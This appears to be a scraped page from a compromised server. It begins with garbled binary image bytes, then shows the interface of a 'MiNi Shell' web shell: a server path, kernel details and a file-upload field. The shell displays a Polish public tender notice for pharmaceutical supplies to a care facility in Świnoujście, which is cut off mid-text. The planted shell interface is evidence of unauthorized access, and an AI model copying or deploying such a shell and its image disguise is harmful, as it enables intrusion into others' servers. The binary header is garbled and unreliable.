JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220119/0002657701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa leków </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD PIELĘGNACYJNO - OPIEKUŃCZY FREGATA W ŚWINOUJŚCIU SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 812012078</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bydgoska 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świnoujście</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(91) 321-21-70</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zpo.swinoujscie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zodfregata.swinoujscie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa leków </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-830d66fc-7979-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00026577</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zpo.swinoujscie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja<br/>między Zamawiającym a wykonawcami odbywa za pośrednictwem platformy do obsługi postępowań<br/>przetargowych, dostępnej pod adresem: https://platformazakupowa.pl/pn/zpo.swinoujscie (zwanej dalej<br/>„Platformą”). Zamawiający może również komunikować się z Wykonawcami za pomocą poczty<br/>elektronicznej, email: zamowienia@zpo.swinoujscie.pl; Zamawiający dopuszcza również możliwość<br/>składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń za pomocą poczty elektronicznej, na adres email: zamowienia@zpo.swinoujscie.pl;<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 31 grudnia 2020 r. (Dz. U poz. 2452).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Składanie<br/>ofert oraz wszelkich oświadczeń odbywa się przy użyciu Platformy. Za datę wpływu oświadczeń,<br/>wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich wczytania do Platformy. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i wykonawcy posługują się<br/>numerem postępowania.<br/>Rejestracja na Platformie, w tym złożenie oferty, wymaga założenia konta użytkownika. W celu<br/>założenia konta użytkownika konieczne jest posiadanie przez użytkownika aktywnego konta poczty<br/>elektronicznej (e-mail).<br/>Wymagania techniczne i organizacyjne korzystania z Platformy określa regulamin Platformy (dostępny<br/>pod adresem: https://platformazakupowa.pl/strona/1-regulamin) oraz instrukcje dla wykonawców<br/>(dostępne pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje). Wykonawca przystępując do postępowania o<br/>udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy, określone w<br/>Regulaminie oraz uznaje go za wiążący.<br/>Minimalne wymagania techniczne umożliwiające korzystanie z Platformy to przeglądarka internetowa<br/>EDGE, Chrome i FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka<br/>Javascript,akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości co najmniej 256<br/>kbit/s.<br/>Platforma jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 rozporządzenia Parlamentu Europejskiego<br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE - ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 poz. 1 z<br/>04.05.2016) Zamawiający informuje, że:<br/>administratorem Pani/Pana danych osobowych jest ZOD FREGATA Sp. z o.o., przy ul. Bydgoskiej 14,<br/>wpisana do rejestru przedsiębiorców prowadzonego przez Sąd Rejonowy Szczecin-Centrum<br/>w Szczecinie XIII Wydział Gospodarczy KRS pod nr 0000896149, NIP 8551485813, REGON<br/>812012078, reprezentowana przezPrezesa Zarządu.<br/>Administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się skontaktować<br/>pisemnie za pomocą poczty tradycyjnej na adres: ZOD FREGATA Sp. z o.o., z siedzibą w Świnoujściu<br/>przy ul. Bydgoskiej 14 (72-600 Świnoujście), lub e-mail: iodo@zodfregata.swinoujscie.pl.<br/>Pani/Pana dane osobowe przetwarzane będą w celu realizacji umowy na „Przygotowanie i<br/>dostarczanie całodziennych posiłków dla pacjentów ZOD FREGATA Sp. z o.o., - na podstawie<br/>art. 6 ust. 1 lit. b ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r.,<br/>odbiorcami Pani/Pana danych osobowych będą podmioty uczestniczące w realizacji umowy na<br/>„Sukcesywna dostawa leków”, służby księgowe, firmy z którymi administrator ma podpisane umowy w<br/>celu świadczenia usług oraz organy władzy publicznej i podmioty wykonujące zadania publiczne<br/>uprawnione na podstawie przepisów prawa.<br/>Pani/Pana dane osobowe przechowywane będą przez okres niezbędny do realizacji i rozliczenia<br/>umowy,<br/>Posiada Pani/Pan prawo do żądania od administratora dostępu do danych osobowych, ich<br/>sprostowania, usunięcia lub ograniczenia przetwarzania,<br/>Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego czyli do Prezesa Urzędu Ochrony<br/>Danych Osobowych (PUODO), ul. Stawki 2 00-193 Warszawa, tel. 22 531 03 00, fax. 22 531 03 01, e mail: kancelaria@puodo.gov.pl.<br/>Podanie danych osobowych jest dobrowolne, jednakże odmowa podania danych może skutkować<br/>odmową zawarcia umowy, administrator nie będzie przekazywał Pani/Pana danych osobowych<br/>odbiorcom w państwach trzecich oraz organizacjom międzynarodowym, administrator nie podejmuje<br/>czynności związanych ze zautomatyzowanym podejmowaniem decyzji wobec danych osobowych, w tym o profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/P/ZO-P/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 237500,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa leków - pakiet 1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33690000-3 - Różne produkty lecznicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący<br/>dostawy Produktów, określonych w tabeli załącznika nr 1 do Umowy – oferty asortymentowo cenowej dla tego zadania („Prawo opcji”).<br/>2.Zamawiający jest uprawniony do złożenia oświadczenia o skorzystaniu z Prawa opcji nie<br/>później niż na 7 dni przed upływem terminu, na jaki Umowa została zawarta.<br/>3.Zamówienie realizowane w ramach prawa opcji (w całości lub w części) jest jednostronnym<br/>uprawnieniem Zamawiającego, a nie zobowiązaniem Zamawiającego, dlatego też<br/>nieskorzystanie przez Zamawiającego z prawa opcji (w całości lub w części) nie stanowi<br/>podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do<br/>Zamawiającego z tego tytułu.<br/>4. Skorzystanie z prawa opcji nie wymaga sporządzenia aneksu do Umowy.<br/>5.W przypadku nieskorzystania przez Zamawiającego z prawa opcji (w całości lub w części)<br/>Wykonawca ma obowiązek wykonania wszystkich ciążących na nim obowiązków wynikających z<br/>realizacji zamówienia podstawowego.<br/>6.Wartość prawa opcji dla danego zadania nie może przekroczyć 50 % wartości wynagrodzenia<br/>gwarantowanego za wykonanie tego zadania, określonego w § 2 ust. 1.<br/>7.Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które<br/>obowiązują przy realizacji zamówienia podstawowego. W konsekwencji do zlecania dodatkowej<br/>dostawy będącej przedmiotem prawa opcji stosuje się odpowiednio postanowienia odnoszące<br/>się do pozostałego zakresu Przedmiotu umowy, w szczególności w zakresie sposobu<br/>wykonywania Umowy, odbiorów, zasad płatności wynagrodzenia, rękojmi, kar umownych oraz zasad odpowiedzialności. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1.1 Cena oferty brutto ( C) 100 %<br/>2. Punkty będą przyznawane wg następujących zasad:<br/>Cena oferty (C):<br/>C = (Cmin / Cob) x 100 pkt<br/>gdzie:<br/>Cmin - cena brutto najniższa,<br/>Cob - cena brutto oferty badanej<br/>3. W celu obliczenia punktów wyniki poszczególnych działań matematycznych będą zaokrąglane do<br/>dwóch miejsc po przecinku.<br/>4. W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez<br/>wykonawców wyjaśnień treści złożonych przez nich ofert.<br/>5. Za ofertę najkorzystniejszą Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa leków - pakiet 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33690000-3 - Różne produkty lecznicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący<br/>dostawy Produktów, określonych w tabeli załącznika nr 1 do Umowy – oferty asortymentowo cenowej dla tego zadania („Prawo opcji”).<br/>2.Zamawiający jest uprawniony do złożenia oświadczenia o skorzystaniu z Prawa opcji nie<br/>później niż na 7 dni przed upływem terminu, na jaki Umowa została zawarta.<br/>3.Zamówienie realizowane w ramach prawa opcji (w całości lub w części) jest jednostronnym<br/>uprawnieniem Zamawiającego, a nie zobowiązaniem Zamawiającego, dlatego też<br/>nieskorzystanie przez Zamawiającego z prawa opcji (w całości lub w części) nie stanowi<br/>podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do<br/>Zamawiającego z tego tytułu.<br/>4. Skorzystanie z prawa opcji nie wymaga sporządzenia aneksu do Umowy.<br/>5.W przypadku nieskorzystania przez Zamawiającego z prawa opcji (w całości lub w części)<br/>Wykonawca ma obowiązek wykonania wszystkich ciążących na nim obowiązków wynikających z<br/>realizacji zamówienia podstawowego.<br/>6.Wartość prawa opcji dla danego zadania nie może przekroczyć 50 % wartości wynagrodzenia<br/>gwarantowanego za wykonanie tego zadania, określonego w § 2 ust. 1.<br/>7.Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które<br/>obowiązują przy realizacji zamówienia podstawowego. W konsekwencji do zlecania dodatkowej<br/>dostawy będącej przedmiotem prawa opcji stosuje się odpowiednio postanowienia odnoszące<br/>się do pozostałego zakresu Przedmiotu umowy, w szczególności w zakresie sposobu<br/>wykonywania Umowy, odbiorów, zasad płatności wynagrodzenia, rękojmi, kar umownych oraz zasad odpowiedzialności. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1.1 Cena oferty brutto ( C) 100 %<br/>2. Punkty będą przyznawane wg następujących zasad:<br/>Cena oferty (C):<br/>C = (Cmin / Cob) x 100 pkt<br/>gdzie:<br/>Cmin - cena brutto najniższa,<br/>Cob - cena brutto oferty badanej<br/>3. W celu obliczenia punktów wyniki poszczególnych działań matematycznych będą zaokrąglane do<br/>dwóch miejsc po przecinku.<br/>4. W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez<br/>wykonawców wyjaśnień treści złożonych przez nich ofert.<br/>5. Za ofertę najkorzystniejszą Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa leków - pakiet 3 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33600000-6 - Produkty farmaceutyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33690000-3 - Różne produkty lecznicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący<br/>dostawy Produktów, określonych w tabeli załącznika nr 1 do Umowy – oferty asortymentowo cenowej dla tego zadania („Prawo opcji”).<br/>2.Zamawiający jest uprawniony do złożenia oświadczenia o skorzystaniu z Prawa opcji nie<br/>później niż na 7 dni przed upływem terminu, na jaki Umowa została zawarta.<br/>3.Zamówienie realizowane w ramach prawa opcji (w całości lub w części) jest jednostronnym<br/>uprawnieniem Zamawiającego, a nie zobowiązaniem Zamawiającego, dlatego też<br/>nieskorzystanie przez Zamawiającego z prawa opcji (w całości lub w części) nie stanowi<br/>podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do<br/>Zamawiającego z tego tytułu.<br/>4. Skorzystanie z prawa opcji nie wymaga sporządzenia aneksu do Umowy.<br/>5.W przypadku nieskorzystania przez Zamawiającego z prawa opcji (w całości lub w części)<br/>Wykonawca ma obowiązek wykonania wszystkich ciążących na nim obowiązków wynikających z<br/>realizacji zamówienia podstawowego.<br/>6.Wartość prawa opcji dla danego zadania nie może przekroczyć 50 % wartości wynagrodzenia<br/>gwarantowanego za wykonanie tego zadania, określonego w § 2 ust. 1.<br/>7.Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które<br/>obowiązują przy realizacji zamówienia podstawowego. W konsekwencji do zlecania dodatkowej<br/>dostawy będącej przedmiotem prawa opcji stosuje się odpowiednio postanowienia odnoszące<br/>się do pozostałego zakresu Przedmiotu umowy, w szczególności w zakresie sposobu<br/>wykonywania Umowy, odbiorów, zasad płatności wynagrodzenia, rękojmi, kar umownych oraz zasad odpowiedzialności. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert w każdym Zadaniu Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1.1 Cena oferty brutto ( C) 100 %<br/>2. Punkty będą przyznawane wg następujących zasad:<br/>Cena oferty (C):<br/>C = (Cmin / Cob) x 100 pkt<br/>gdzie:<br/>Cmin - cena brutto najniższa,<br/>Cob - cena brutto oferty badanej<br/>3. W celu obliczenia punktów wyniki poszczególnych działań matematycznych będą zaokrąglane do<br/>dwóch miejsc po przecinku.<br/>4. W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez<br/>wykonawców wyjaśnień treści złożonych przez nich ofert.<br/>5. Za ofertę najkorzystniejszą Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda 